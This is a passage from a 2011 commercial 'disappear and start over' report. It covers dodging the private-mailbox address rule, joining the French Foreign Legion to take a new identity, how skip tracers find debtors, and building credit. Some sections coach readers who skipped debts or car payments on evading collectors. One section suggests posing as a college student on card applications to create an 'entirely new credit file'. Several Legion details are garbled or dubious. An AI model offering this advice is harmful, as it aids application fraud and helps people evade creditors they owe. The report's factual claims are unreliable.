# 67 +Anywhere, US 34567 +New Format: (is obviously a mail box) +John Jones +PMB #67 +123 Main Street +Anywhere, US 34567 +Under this new rule, any mail sent to one of those rented +mail boxes will have to be addressed in this federally +approved format or it will be returned to the sender. This +whole thing is just another useless government tactic. Think +about it - how many people know what PMB stands for? But +don't worry - I've received reports of a way to get around this +new restriction. +In a city of any size you will find outfits that rent small offices +for people who need a small working space on an occasional +basis. Of course these firms also handle their client's +business mail and phone calls. One lady I talked to +volunteered that she is getting quite a few requests these +days from commercial box users who are now interested in +renting an office so they can receive mail at a street address. +As there's no rule against it, she has set aside one small +office in each of her locations for the use of these clients. +She charges a bit more than the commercial box rental +outfits, but can handle her clients mail without worrying +about the new PMB requirement. +Since her customers will be officially renting space from her, +they can go ahead and receive mail at the office's street +address. She now has over forty different people sharing a +single office! So now her most profitable office is the one +that's never used! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 205 - +Reproduction in any form is prohibited without written permission. + +The French Foreign Legion +Don’t laugh – the French Foreign Legion is a serious option for +those who have problems they want to leave behind. Since 1831 +the Legion has been there for misfits who needed to walk away +from their past problems. +On the positive side – you get a completely new identity along with +a new French passport. On the negative side, you’ll be subjected +to the toughest military training on earth – bar none. +Most people assume the Legion went out of business long ago – +but they’re wrong. Today the Legion has almost 8,000 men under +arms in a dozen different locations and another dozen that are +kept very secret. +The Legion has always been there as an option to those who +passionately desire a second chance at life. It’s a unique military +outfit as it’s the only one in the world whose soldiers are not +bound together by a single national flag. Legionnaires come from +over 130 different nations with the only nation barred from +membership being the French themselves. (If you are French and +wish to join the legion you’ll have to change your identity and +citizenship first.) +To say that the Legion basic training is tough is a vast +understatement. The following should give you some idea of the +attitude legionnaires have to adopt before becoming part of this +elite group. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 206 - +Reproduction in any form is prohibited without written permission. + +You’ll certainly never hear anything like this in the US Marine +Corps. +Sergeant: Do you men want to die? +Legionnaires: Yes, Sergeant! +Sergeant: Good, I shall send you someplace where you +can die! +Legionnaires: Thank you, Sergeant! +Legionnaires are foreigners, so the French don’t really care if they +live or die. To them these troops who are all foreigners are +completely expendable. The government of France routinely +sends in the Legion before the French army to help reduce French +casualties. In a way the Legion is cannon fodder for the French +army. Statistically your odds of dying during your five year long +hitch hover around 10-15%, or perhaps a bit higher these days +now that there is so much war and terrorism going on. +When you apply to join you will get a personal interview with a +Legionnaire officer who will ask you the obvious question “Why do +you want to join the French Foreign Legion?” +You should have an answer ready. If you have a past you’d like to +leave behind, you should make that known during the interview. If +you’ve had problems with the law, spell them out – they take +criminals on the run provided their crimes aren’t too horrible. +(Convicted felons will probably be refused entry – but not always.) +Minor debts will be ignored. +The US military routinely rejects applicants who have had +problems with the law. If you have a long rap sheet - the Legion +may be your new home. Though the good old days of “no +questions asked” are sadly behind us their investigation isn’t all +that severe. Today you’ll have to undergo a series of interviews by +what the Legionnaires call “the Gestapo” but their rules are still +rather liberal compared to those of other nations. +After five years of good service you will be allowed to, if you +should so desire, apply for French citizenship. You don’t have to +speak French to join as you will be taught the language but it +would be a good idea to learn some smattering of the lingo before +you enter basic training. +Also, since the Legion isn’t bound by the patriotism of a single +nation, they replace that unifying factor with a strong sense of +family that is deep and very real. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 207 - +Reproduction in any form is prohibited without written permission. + +Once you go through all that demanding training, you will bond +with your Legion brothers in a way that’s hard to explain. Their +varied nationalities will fade as they become full members of a +very tight team. +The motto of the Legion is simply “Lego Patria Nostra” which +translates to “the Legion is your country”. And it’s also your family. +They even have their own retirement home (a villa in the south of +France actually) where you can reside until death should you +complete a full contract. +If the Gestapo feels it’s necessary, they will hand you a form with +a new name. You will be asked if that meets with your needs. If +you answer in the positive you will be asked to sign the form. +From that moment forward your old identity no longer exists. You +will be addressed in person and on paper under your new +Legionnaire name. +Should any outsider make inquiries about you by your old name, +they will run into a solid brick wall of privacy. They will receive +back a formal reply simply stating that according to official records +no one under that name resides in their facility. +If you are still alive when your 5 year long contract expires, you +will be asked to make a decision: +1. You can discard the Legion name you’ve used during your +contract and choose to reclaim your old original name. Your +passport (which you surrendered the day you entered the +Legion) will be returned to you along with any other identity +documents the Legion may have. The Legion calls this +process rectification. +2. You can choose to abandon your old identity and permanently +adopt your Legion name as your new civilian name. You will +surrender your old passport and other identity documents and +will be issued new ones including a genuine French passport +all bearing your Legion name. This is provided in recognition +of your service to France. +Why would anyone want to join the Legion? The classic answer is +that men join the Legion to forget. +Q: Why did you join the Foreign Legion?” +A: I joined to forget! +Q: Forget what? +A: I forgot. See, the system works! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 208 - +Reproduction in any form is prohibited without written permission. + +But make no mistake – the Legion is a tough way to go. The +training is terribly, terribly difficult. The basic training can take up +to 4 long months. If you relish the idea of making a 50 Kilometer +march through the desert to the sea wearing a full uniform +including combat boots and a rifle including a 30lb pack on your +back – and get this – without any food or water - the Legion may +be your cup of tea. +In order to encourage mental and physical toughness, during your +basic training you’ll eat an extremely meager diet, sleep in hot or +cold barracks (with or without luxuries like blankets) and be forced +to make long marches after long days of no sleep. Toughness is +the key goal of their training program. They will push you to your +physical and mental limits – and well beyond. +At the end of their basic training the legionnaires make the 50km +long hike to the sea. Those who make it are awarded the widely +respected tall cylindrical white hat know as the “Cape Blanc” +(White Hat). When I see a Legionnaire wearing that tall white hat, +I’m filled with respect. They don’t hand hats like that out in boxes +of breakfast cereal! These guys are real men. +Married and single men are accepted but they can only enter as +single men. Only established Legionnaires are permitted to wed +but that comes later – several years later. For the first few months +you won’t even be allowed to make outside phone calls. You will +be relieved of your family photos when you arrive. Why would you +need them anyway? The Legion is your new family. Your fellow +legionnaires are your new brothers. Your commander is both your +new father and mother. +If you fail to adopt the right attitude or fail to learn your lessons +quickly enough – you can expect to suffer blows. If you persist you +will be beaten or imprisoned or both. (Their prison cells have no +beds – you sleep on the hard floor.) +Some men have been beaten to death which really isn’t much of a +problem for the Legion as the men had legally vanished from the +world when the joined up so no one was terribly concerned with +their well-being. However there are signs that the old Legion +brutality is under review these days. All this harshness flows from +their need to train soldiers who never surrender and instead swear +to fight to the last man. +Americans find four years in the US Marine Corps an ideal +preparation for the grueling Legion basic training. One thing for +sure – You’d better be in really excellent physical shape when you +show up for your Legion basic training. And get a nice short +haircut also. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 209 - +Reproduction in any form is prohibited without written permission. + +Since the Legion hangs out in African desert locations, you might +want to spend some time in the heat and get used to being +extremely physically active in 100 degree plus environments. Oh, +and be sure to do this training with little or no water as that is the +Legion way. +Only those who are burning with what they call “warrior lust” need +apply. If you complete a five year long contract chances are +excellent that you’ll see some action – most likely in a North +African desert location. If you passionately want some real +adventure – look into the Legion. +Before you consider the Legion, be sure to talk to a recruiter and +get official information and guidance as the Legion is changing +with the times. They are even considering taking in women which +shows you just how much change is in the air. +You’ll want to have the very latest facts in hand before you make +such a drastic obligation. Desertion rates are high in the Legion as +far too many men join before they fully understand exactly what +they’re getting into. +How They Find Us +There are a host of folks who may be looking for you. First +there are the common skip tracers. If you left behind some +bills, you can bet they’ll be on your trail. +If you left behind some real debt, say over $5,000 or more, +you can expect them to be hot on your trail. +If you leave behind truly huge debts, you can expect that +some rather professional and experienced private +investigators will be looking for you. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 210 - +Reproduction in any form is prohibited without written permission. + +Then you have the repo men. If you took your car without +bothering to make your payments, they will join the game. +Whatever their motivation they all share some common +strategies so in an effort to educate you and make you all +that more effective at vanishing, here is a cram course on +how these persistent snoops operate. +411 +The first step is a call to 411 to see if you have a current +phone number listed. If you need a phone, buy a prepaid +cellular, use it for several months and then fling it into the +sea and buy another. Or at least get an unlisted phone and +keep the number to yourself. +Your Credit File +They get a copy of your most recent credit file. What they’re +looking for are credit accounts with the most recent activity. +They can call the firm and offer to share their notes in +exchange for more recent information on their target. +Check the Reverse Directory (Haines) +If you’re listed they may get your new address though these +directories aren’t supposed to have unlisted numbers in +them, they sometimes do. +Address Service Requested +Next they send you a letter with “Address Service +Requested” on it. If you have moved and left a forwarding +address with the post office, the letter will come winging +back with your new address written across it’s face. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 211 - +Reproduction in any form is prohibited without written permission. + +Call Friends, Family Neighbors and Personal References +They then “pump” those who know you for info. They may +use various pretexts to flush you out. They may call your +sister and tell her that they have a huge check for you but +can’t quite locate you. If she isn’t in on what’s going on she’ll +happily hand over your current address and a lot more. +Hit the Public Record Services +Most of these databases are available online so today it’s +much easier than in the past. One of their tricks is to keep +checking the DMV records of parking tickets. +If you get a parking ticket, it may list your home phone or +address that will lead them directly to you. (so choose your +parking spaces very carefully!) +Lastly, They’ll Call Other Creditors +Many creditors will exchange information with other snoops. +Most will share some information while others are real +blabbermouths. A few won’t entertain such calls. But the +skip-tracer who has info to offer will probably get some info +in return. +Sorry, We Don't Do Fake ID! +We get a steady flow of email asking us to provide various +kinds of fake identification documents. We are not in that +business nor do we know anyone who is. Our only business +is the publishing of reports that contain controversial +information. +That’s It! +At this point I can only hope that the information in this report +will help empower you to seize control of your own destiny. +You now have everything you need to give yourself a second +chance at life. One final tip: When you start living your new +life - KEEP YOUR MOUTH SHUT ABOUT YOUR OLD LIFE! +This is the most common way to destroy all that you’ve +© Copyright 2011, Ariza Research, All rights reserved - ABP - 212 - +Reproduction in any form is prohibited without written permission. + +worked to create. Don’t blow it! Good luck. +Welcome to the New World Order! +Until recently my wife and I have been happy to assist new +identity-seekers in any way we could. We know what it’s like +to have personal problems and can certainly sympathize +with those of you that are going through difficult times. +Unfortunately, recent court decisions and legislation +(Particularly the so-called Patriot Act) have made it +impossible for us to provide personal assistance of any kind. +We can no longer help our customers or even answer +questions sent to us via email. According to these +increasingly restrictive court decisions, answering a question +for someone would automatically expose us to criminal +prosecution for any illegal act they might have committed in +the past. +Our attorney has advised us not to provide assistance to +anyone. No exceptions - so please don't ask. It seems we're +living in a police state these days. +We deeply regret having to take this drastic step but until the +government abandons it’s police state tactics we really don’t +have any option. +- Jim & Susan Petersen 2011 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 213 - +Reproduction in any form is prohibited without written permission. + +OTHER TOP SECRET REPORTS +AVAILABLE FROM ARIZA RESEARCH +WEALTH SECRETS OF THE RICH NEW! +Most people don’t even know that these secret wealth-making +tactics exist! We’ll give you a rare look behind the scenes where +you’ll discover wealth secrets never before released to the general +public. Learn how the rich REALLY made their money. It will +surprise even shock you! Armed with this previously secret +information you’ll be able to quickly and easily make money by +copying their same methods! +DUMP YOUR DEBT NEW! +Clever lawyers know how to live like kings. When their debts pile +up, they use debt negotiation to wipe them away – quickly and +permanently. Why struggle with credit card and other debts when +you don’t have to. 100% Legal! +PRIVACY SECRETS OF THE RICH AND FAMOUS +Some experts will tell you that personal privacy is dead. Don’t you +believe it! While technology has provided big brother with new +surveillance technologies - that same technology can be used to +confound the snoops and build an iron-clad privacy fortress +around your own personal and financial privacy. 100% total +privacy is still possible – if you know how! +www.ariza-research.com +© Copyright 2011, Ariza Research, All rights reserved - ABP - 214 - +Reproduction in any form is prohibited without written permission. + +Quick Credit Creation +by Jim & Susan Petersen +© Copyright 2011 – Ariza Research – All Rights Reserved - ABP +Disclaimer: +Do not break the law. This publication is being sold for academic, +educational and entertainment purposes only. Nothing in this publication +is intended to encourage illegal or immoral acts now or at any point in the +future. Always consult with an attorney familiar with laws in your local +area before attempting to employ any of the techniques discussed in this +report. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 215 - +Reproduction in any form is prohibited without written permission. + +Establishing an Entirely New Credit Record +Student Credit Cards +For many people, their first experience with credit comes when +they arrive at a college. The credit industry knows this and is +eager to get these new consumers into their system as quickly +and easily as possible. +The credit card banks also know that college students have little +income so they may run up some debts which will give the banks +an opportunity to earn some interest. +The banks also know that these students will in a few years move +into positions that will provide them with above average earnings. +Because of these factors credit card banks are particularly +motivated to locate college students and get new cards into their +hands. This creates an interesting opportunity for anyone who +seeks to create a new credit file. +If you wander around any college campus you’ll find posters with +holders full of applications for student credit cards. If you fill out +one of these applications and make it looks as though you’re a +new college student, you’ll get a major credit card and a rare +opportunity to create an entirely new credit file. +Here is a real back door into the world of credit. College students +are a special market for credit card banks. Though college +students don’t have much money, the banks know that they have +parents who love them and will, with rare exception, back them up +financially so the credit card issuers are particularly liberal when it +comes to issuing cards to college students. +Also, the banks presume that spending habits established during +these years may become permanent later so getting their credit +card into a student’s hands is a real priority. +Then there is the issue of income. Most any normal bank credit +card will want to see employment and income before opening an +account and issuing a card. But with students the rules are much +different. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 216 - +Reproduction in any form is prohibited without written permission. + +The banks know that the student’s income will be at or near zero +now but will increase later after graduation. So they’re willing to +issue major credit cards to people who have no current income. +This is a very unusual kind of financial deal – one you can easily +take advantage of. +And here is a real irony. Many college students find that it much +more difficult to get a major credit card after graduation when their +pulling down substantial salaries than before when they’re stone +broke! Who said financial dealings have to make sense? +You have two strategies here. You could enroll in a college course +and then wander around the campus keeping your eyes open for +those special college student credit card applications. Get several +applications and compare them and find the one that offers the +best deal. +You can then fill one out listing your school on the application. You +could also cheat the whole system by just getting the application +and filling it out without bothering with enrollment. +The student cards usually come with high annual fees, high +interest rates and low credit limits. But why should you care, they +are real bank credit cards that can be used to create a new credit +file! +The Easy-to-Get Debit Card +If you need a major credit card, nothing can beat the "debit" card. +Many banks offer debit cards that look and work just like a +genuine Visa or Mastercard with one critical exception. They are +not credit cards but are instead debit cards. +When you purchase something with one of these cards, instead of +adding the sum to your account and sending you a bill, the bank +just subtracts the purchase amount directly from your checking +account. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 217 - +Reproduction in any form is prohibited without written permission. + +If there aren’t enough funds in your account to cover the +purchase, the transaction is refused right there at the store. +Using one of these cards is exactly like writing a check except that +they’re much more acceptable to the merchant as they can be +instantly verified which protects the merchant against taking a bad +check. And the banks like them because they can charge both the +purchaser and the merchants a separate group of fees. +Because there’s no real risk involved in their use, debit cards are +quite easy to get. Some banks don’t bother with a routine credit +check, as they don’t see much risk here. What have they got to +lose? +You may have to call several banks but you should be able to find +one that will give you their debit card without much fuss. You open +a checking account and they provide you with a debit card with +either the Visa or MasterCard logo. +As easy as these cards are to get, they do have several +limitations. Some of the car rental companies no longer accept +debit cards, so renting a car with a debit card may be a problem. +(They can tell a debit card from a real credit card by a coded digit +in the card’s number.) +The most important thing about debit cards is that they don’t +report your credit transactions to the three biggest credit reporting +agencies so debit cards are of no value whatever when it comes +to rebuilding your damaged credit rating. +The Secured Credit Card +Another approach is to go after a "secured" credit card. Again, +these cards look and work just like real Visa or MasterCards but +have a catch. In order to get one, you must deposit a required +minimum sum in a savings account with the issuing bank as +security. +They usually pay a nominal interest on your savings account +usually around 3%. Unlike debit cards, if you shop around you will +probably find a card that reports your payments to the three major +credit reporting agencies – but you’ll have to look around. This can +help you quickly and easily rebuild a battered credit history or +create an entirely new credit record from scratch. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 218 - +Reproduction in any form is prohibited without written permission. + +Though secured credit cards can come in handy, be well warned +that there are sharks swimming in these waters. You'll have to ask +a ton of questions if you want to get just the right card. Make a +mistake and you'll get involved with the wrong issuer who will +waste your time or worse, they may throw your entire credit +rebuilding program off the tracks. Be careful and be prepared and +you won’t get ripped off. +First, always ask how long before they convert your secured card +into a traditional unsecured card. Six to eighteen months is the +usual range with a year being the most common time span. +Be sure to pursue the card with the best terms and at the same +time concentrate on getting a card with a major bank, not one of +those sleazy firms that only issue their secured cards to the most +credit unworthy. Those issuers have negative reputations that you +don't want listed on your credit record. Try to land a deal with a +major national bank. +1. What is the minimum deposit required? (May be as little +as $100) +2. How high can you raise the credit line? (By increasing +the securing deposit - $5,000 is the usual ceiling) +3. Do they report your payment history to the credit +bureaus? +4. If so, how do they report your payment? (As a secured +card or as an unsecured card like all the others) +5. Is there an application fee? If so how much is it? (Some +issuers cheat applicants by charging huge up-front +application fees) +6. Will they accept a previous bankruptcy? (No? walk away +and call the next card on your list) +7. Is there an annual fee? (Some charge one, many don't) +8. What will my initial credit limit be? (Will it be more than +the deposit) +9. Do they accept out of state customers? +10. When they issue you an unsecured card, will it be a +different card with a new number? (a positive for you - +another positive credit reference) +11. Do they include toll-free 24-hour customer support +(Useful for checking credit limits before making purchases) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 219 - +Reproduction in any form is prohibited without written permission. + +12. What is the interest rate? (The rate will probably be +higher than usual around 14-21% is typical) +13. Will the interest rate fall with a good payment history? If +so when? +14. How do they determine the credit limit on new +unsecured cards? +You should increase your credit limit as much as possible as this +data is reported to the credit bureaus and the higher the limit the +better. +If your future unsecured credit limit will be the same as your +secured card, perhaps you should deposit as much as possible +just before your conversion is processed. In that way you can +quickly gain an impressive high-limit unsecured card credit +reference. (If you can come up with the cash) +Finding a Good Secured Credit Card +Secured cards come in a variety of different forms. The issuers +also have very different requirements. Some will issue a card +without a credit reference while others wouldn’t think of it. Some +will require that you provide pay stubs while many won’t bother. +Some charge huge up-front application fees while others think +that’s a bad business practice. +Your best move here is to shop around. Get online and spend +some time looking at the various deals that are out there. Go to +Google and search on the term “secured credit cards” but be sure +to place the phrase inside quotation marks. +If you’re in a hurry you will find several outfits online that for a +modest price will sell you a list of secured credit card offers +complete with toll-free application phone numbers. Be careful to +buy only those lists that are up to date. Many of the lists being +sold are terribly out of date. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 220 - +Reproduction in any form is prohibited without written permission. + +The Rules for Secured Credit Cards +There are a few rules to keep in mind when you use your secured +credit card. First, you must use the card on a regular basis. Just +walking around with the card in your pocket won’t do anything for +you. The best idea is to run up your outstanding balance to around +80% of the credit limit. +1. Use Your Secured Card Regularly +Don’t pay each monthly bill in full. This way you’ll pay a lot of +interest, which the bank will love you for (the interest rates on +these secured cards are very high – usually around 17-19% or +even more). +2. Always Pay Your Bill Right on Time +Be sure to pay your bill well before the due date. If you make late +payments you’re wasting you time as you’ll never build up the +good credit you’ll need to get a real unsecured credit card. +3. Never Exceed Your Credit Limit +If you go over your credit limit the bank will hold it against you. +Before making a larger purchase call the bank to be sure you +have enough credit left. +If you don’t break any of these rules, at the end of the year you +should start to receive offers for the traditional un-secured +bankcards. +You can then apply for one or more and then return your secured +card and request that they close your savings account and return +your deposit funds (plus your interest). +Or you may actually receive an offer of an unsecured card from +the same bank that issued you the secured card. That’s what +happened to me. It was great. The trust they showed in me was +deeply appreciated. +I called and cancelled my secured card, closed my deposit +savings account and got a brand new unsecured card all at the +same time. And best of all, my credit record had been completely +rebuilt. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 221 - +Reproduction in any form is prohibited without written permission. + +Sources for Secured Credit Cards +Amalgamated +$500 Min. +Bank of 800-723-0303 +Deposit +Chicago +$300 Min +U.S. Bank 800-285-8585 +Deposit +American $300 Min. +800-610-1201 +Pacific Bank Deposit +Wells Fargo $300 Min. +800-642-4720 +Bank Deposit +Plains +$300 Min. +Commerce 605-948-2344 +Deposit +Bank +Emigrant $500 Min. +800-688-2265 +Savings Bank Deposit +Union +$250 Min. +Plus/Household 800-651-5108 +Deposit +Bank +City National +$500 Min. +Bank of West 800-846-2075 +Deposit +Virginia +$300 Min. +Citibank, NA 800-950-5114 +Deposit +First Union $400 Min. +800-377-3404 +National Bank Deposit +First Premier $200 Min. +800-987-5521 +Bank Deposit +Key Bank & +800-840-5577 +Trust +© Copyright 2011, Ariza Research, All rights reserved - ABP - 222 - +Reproduction in any form is prohibited without written permission. + +Associates +$300 Min. +National Bank 800-533-5600 +Deposit +of Delaware +First Consumer $100 Min. +800-876-3262 +National Bank Deposit +$500 Min. +Capital One 800-548-4593 +Deposit +$300 Min. +Bank of Hoven 800-777-7735 +Deposit +Sterling Bank & $219 Min. +800-767-0923 +Trust Deposit +$300 Min. +JC Penney 800-533-5600 +Deposit +Lending Tree 704-944-2110 +Capital One 800-333-7116 +FCNB 858-505-9261 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 223 - +Reproduction in any form is prohibited without written permission. + +Co-signing +If you have someone that trusts you completely, you might want to +try having them co-sign a one year loan that can quickly help you +create a positive credit record. (If you have someone who is willing +to co-sign for you, consider yourself very fortunate!) +But there are potential problems. You simply must keep your +payments current. If you make even a single late payment both +you and your co-signer’s credit records will suffer. +And if you do screw things up you will also lose your relationship +with your co-signers also. There’s an old saying that there’s no +quicker way to lose a friend than loaning them money. +Here’s a secret trick that can be used to accelerate the credit +reporting process. You can create a positive credit history quickly +by paying off your loan quickly. +You go through the normal loan process including the co-signing. +When you get your first loan payment bill, you can pay off the +entire balance immediately. (Do not attempt to pay anything +before the first payment due date or you will have departed from +the agreed upon loan terms which will might end up being +reported to the credit reporting agencies as a bad payment.) You’ll +save some interest but will probably end up paying most of it +despite the early pay-off. +The lender will close out the loan as “paid in full” and notify the +credit agencies. Within a month your credit file will reflect that you +had a two year loan of a certain amount that you paid off fully +without any late payments or other problems according to the +terms of the loan contract. +Fully Secured Loans +I’ve only done this once and I used a credit union at my place of +employment. I knew my credit rating was terrible so I established +both a checking and savings account with the credit union. +Six months later I wandered into their office and requested a face- +to-face meeting with one of their officers. I openly revealed my +problem. I had terrible credit and badly wanted to improve my +credit rating by creating a positive new credit agency report. +First I showed them that I had been slowly accumulating $2,000 in +my savings account and asked if they would loan me $1,500 with +my savings account balance as collateral. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 224 - +Reproduction in any form is prohibited without written permission. + +They immediately offered to provide me with the loan which would +be at an interest rate just two points higher than the interest my +savings was accumulating. The whole loan ended up costing me +less than $50. +The paperwork was very light, just two pieces of paper and a +single signature. I had to surrender my savings account booklet +until the loan was repaid. I paid the loan off within three months. +One small potential problem though. Some credit unions don’t +bother with reporting their loans to credit agencies. Since our +whole purpose here is the creation of a positive credit reference, +be sure to ask the credit union officer if they routinely report all +loans to the major credit agencies. +And later when the loan is paid off. Go back in after your loan is +paid off in full and remind them that you need the payments +reported to the major credit agencies. +Credit unions are far more helpful than your average commercial +bank. If you need to create a new credit file - they can be very +useful. +Other Tips +Since they don’t involve revolving charges, gasoline credit cards +are often easier to obtain than other credit cards. Department +store credit cards are also somewhat easier to get as the issuer is +eager to increase their sales by finding new credit customers. +Watch for special promotions. Gas cards are advertised on TV +while department store cards are pushed in the store. Keep an +eye out for special promotions and you’ll get a solid gold +opportunity to create a new credit file. +Worthless Credit Cards to Avoid +Many credit cards don’t’ bother to report transactions to the credit +reporting agencies so are worthless when it comes to creating or +rebuilding credit histories. Special purpose cards in the fields of +entertainment, travel, local shopping and gasoline often neglect to +report transactions to the credit reporting firms. Ask before you +apply. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 225 - +Reproduction in any form is prohibited without written permission. + +Dormant is Dead +When you have bad credit, you should get busy repairing it +immediately. Letting a credit file go dormant is a bad move. +Lenders, insurers and employers like to see up-to-date information +on the credit files they pay for. Stale old information turns them off. +The good news about bad or non-existent credit is this – you can +start improving it by simply making payments on time. By making +even a simple on-time payment, you start a ball rolling that will +eventually create a first rate credit rating. +The new positive information will immediately begin to replace the +old negative information. So keep your financial affairs moving in +ways that keep your credit file current – and positive. +Debt Settlement and Debt Repair Traps +Debt settlement is great for repairing bad credit provided you can +put your hands on enough cash. +If you can afford to offer a creditor at least 35-40% of the +outstanding balance, you may approach them and offer them the +lump sum in exchange for a release from the entire debt. Most +lenders will be willing to consider such an offer. (If you end up in +bankruptcy they may get exactly nothing!) +Now here is a problem that very few people know about. Should +your creditor forgive a certain amount, our friends down at the IRS +will want their share as they consider such sums as normal +income – subject to income taxes. +If you do manage to land a quick debt settlement, be sure to ask +how it will be recorded on your credit file before you write the +check. Some firms actually record the forgiven amount as being +“in arrears” which will cause great harm to your credit rating. Be +sure the account balance is fully reduced without any mention of a +deficiency. +Should your bank balance not allow such an offer, you’ll have to +beg for some relief in the form of reduced interest rates. Either +way, if you should land a deal with a credit card bank, be sure to +get the deal in writing before you complete the transaction. That +way if the bank later refuses to acknowledge the deal to the credit +reporting agency, you’ll have a document that will legally establish +that a new deal did in fact exist. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 226 - +Reproduction in any form is prohibited without written permission. + +Debt repair is a real trap. Some years ago some scam operators +found that they could clean up a credit record simply by +bombarding the credit agencies with bogus demands for the +correction of “erroneous” entries. This approach no longer works +and can actually harm your rating if you should attempt it. +The myth that a damaged credit rating can be quickly repaired by +simply hiring an expert experienced in the ways of credit is just +that – a myth, and a dangerous one at that. Avoid these people +like the proverbial plague! +Before dealing with any sort of credit related business – always +take the time to check with the better business bureau to see if +there are any complaints on file. +Also, do a Google search on the firm’s name (in quote marks) and +you will probably find a host of bitter complaints from those the +firm has victimized. +Ho Ho Ho! +At Christmas time it’s not unusual to find a table set up in the +midst of a department store floor offering instant credit cards. +During the holidays the store will be pushing especially hard to +enroll new customers so they may be more lenient when it comes +to credit standards. +Tell the nice lady at the table that you have no credit record and +would like one of their cards to help you establish one. Many of +these people are being paid on commission - which means they +can be VERY helpful. +Open Bank Accounts +Open both checking and savings accounts with a major local +bank. Though bank accounts aren’t usually mentioned on most +credit reports, having these accounts so you can list them on +credit applications can be a real positive for several different +reasons. +First having banks accounts shows that you are financial +responsible. And secondly, if you have even a small sum in your +savings account, it shows that you have plans to put away some +money that you can use later to make sure you make your +payments on time even if you should happen to fall on hard times. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 227 - +Reproduction in any form is prohibited without written permission. + +Turn Negatives in Positives +Should you be turned down for credit, be sure to ask why. Get as +much information as you can. Then be sure to use the law. When +you’ve been turned down you have the right to get a free copy of +your credit report – the one that caused the lender to back out on +you. +Again – study it carefully to see exactly what messed up the deal. +If your credit report has an obvious error on it (most files contain +substantial mistakes), call the reporting agency and demand their +official error correction form. +If the agent you speak to attempts to talk you out of challenging +the error – ignore them, they’re paid to do that. Insist on getting +the official form, fill it in completely and accurately. Then forward it +via certified mail and attach any and all supporting documentation. +Only send copies are many such forms are intentionally +misplaced. +I was turned down for a loan once because someone who had my +same name including the same middle initial had bought some +land at a tax auction in Texas and didn’t bother to follow through +on the transaction. The whole thing was right there for the world to +see on my credit report. +I called and notified them of the mistake but they were much less +than accommodating. The lady sneered at me over the phone. But +when I went through the official correction process I received a +confirmation that when they checked the social security numbers, +they discovered that the Texas man was in fact someone +completely separate from myself. +This only goes to show you that the credit people are less than +careful when it comes to posting negative information that can +destroy someone’s life. +If the credit agency treats you like dirt and won’t listen to you, +calmly inform them that in your opinion they are ignoring federal +laws and that you intend to file an official complaint with the +Federal Trade Commission. +Then follow through on your threat – the phone number of the +FTC is: (202) FTC-HELP. If the credit bureau did in fact break the +law, your complaint will get you the changes you desire and create +a real legal problem for the bureau. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 228 - +Reproduction in any form is prohibited without written permission. + +Forcing Credit Bureaus to Clean Your Credit Record For You! +Here’s another approach to forcing the credit bureaus into line. It’s +very down and dirty but it’s been used to great effect. +Launch a website that accurately lists your experiences with the +credit reporting agency. Include dates and times and best of all, +names of agents and their comments. +Do not get angry. Do not vent your spleen. Only list the actual +transactions and conversations. Then submit your new site to +Google and Yahoo (if you can afford the $299 fee). Then sit back +and wait. +Soon, very soon they will be in touch. These credit reporting love +to operate in secrecy and hate it when some lowly consumer +shines a bright light on their dirty dealings. They don’t need the +negative publicity. +Avoid Cash Advances +Credit card cash advances are expensive. Not only do they zing +you with incredibly high interest rates, they also start the interest +clock running the day of the transaction or in some cases even +earlier! Cash advances are expensive. +They also tarnish your credit record as they create the impression +of financial difficulty. Only someone who was desperate because +they don’t know how to handle money would borrow money on +such terrible terms – or so they think. +Find the Best Credit Report +If you request copies of your credit reports from the three major +credit reporting agencies, chances are you’ll be surprised to find +that what they contain varies widely. You might expect them to all +contain the same information but that’s now how it works. +If you have a black mark on your record, you may find what others +have, that your black mark may appear on one or two reports but +seldom on all three. If that’s the case with you – make up copies +of the most favorable report and keep them with you when you +apply for credit. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 229 - +Reproduction in any form is prohibited without written permission. + +Closing Out Credit Card Accounts +Here is a widely held myth that can be particularly dangerous +when trying to improve a credit record. Most people feel that +should you have an old credit card with some late payments in it’s +history – all you have to do is close out that account, chop the +card into pieces and it will be as though the card never existed. +The past payment problems will vanish forever. +If only it was that easy! In fact, the opposite is true. Many credit +card issuers will eliminate the records of late payments on a two to +three year cycle. Keep your card active and your payments +current for that long and the late payments will fall off your record +automatically. +But should you close out the account, the record of your sins will +last for a full seven years or even longer! The reverse is also true. +If you have an open account that you’re sure includes only on-time +payments, you can kill that card if you have too many open cards. +(Two to four cards seems to be the optimum number from a credit +reporting standpoint) For this reason, don’t be in a hurry to discard +those old accounts. +If you have an old card account that has a relatively good credit +record, you may want to keep it and instead close out a card with +a shorter record. In this way you’ll be retaining a longer record +which will tend to improve your credit rating. +Never close several accounts at the same time. If you have +numerous accounts you wish to close, shut them down slowly +over several months. Acting too fast will create the impression that +you anticipate financial problems. +You may want to get a current copy of your credit report a month +later just to be sure that the account you want closed has been +correctly reported as closed. If not, you’ll have to contact the +reporting agency and request they record the status change. +Excessive Debt +Lenders regard too much outstanding debt a strong negative. +They look at two factors when they judge your credit. First is your +desire to pay which is indicated by your payment history. Second +is your ability to pay which is a measure of how much income you +have, how many assets you have minus what you owe. +If you owe too much a lender will doubt your ability to repay any +future loans. If your monthly debt payments total more than 20- +25% of your take-home pay, you may have a problem. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 230 - +Reproduction in any form is prohibited without written permission. + +If you have more than five major credit cards, it will also look +rather bad for you. If you can, reduce the number to four or three +would be even better. +Divorce Traps +Should a judge or other legal entity sever your credit affairs from +that of your old spouse, you may feel you’re finally 